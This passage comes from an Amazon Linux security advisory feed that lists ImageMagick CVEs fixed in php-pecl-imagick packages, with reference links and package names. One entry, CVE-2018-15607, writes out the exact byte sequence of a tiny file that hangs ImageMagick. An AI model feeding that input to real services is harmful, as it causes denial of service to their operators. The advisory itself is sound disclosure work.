In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pecl-imagick" version="3.4.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-3.4.4-2.15.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-2.15.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-2.15.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-3.4.4-2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1813</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1813: medium priority package update for php70-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
